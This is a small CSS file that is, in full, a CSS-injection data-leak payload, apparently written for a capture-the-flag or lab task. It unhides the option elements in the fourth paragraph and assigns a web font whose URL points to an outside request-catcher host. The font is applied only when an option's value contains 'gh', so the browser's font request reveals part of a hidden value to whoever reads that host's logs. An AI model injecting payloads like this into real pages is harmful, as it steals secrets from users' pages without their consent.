@charset "UTF-8";

p:nth-of-type(4) option {
    display: block !important;
    visibility: visible !important;
}

@font-face {
    font-family: "pair-gh";
    src: url('https://css_task_test.requestcatcher.com/flag?gh');
}
p:nth-of-type(4) option[value*="gh"] {
    font-family: "pair-gh";
}
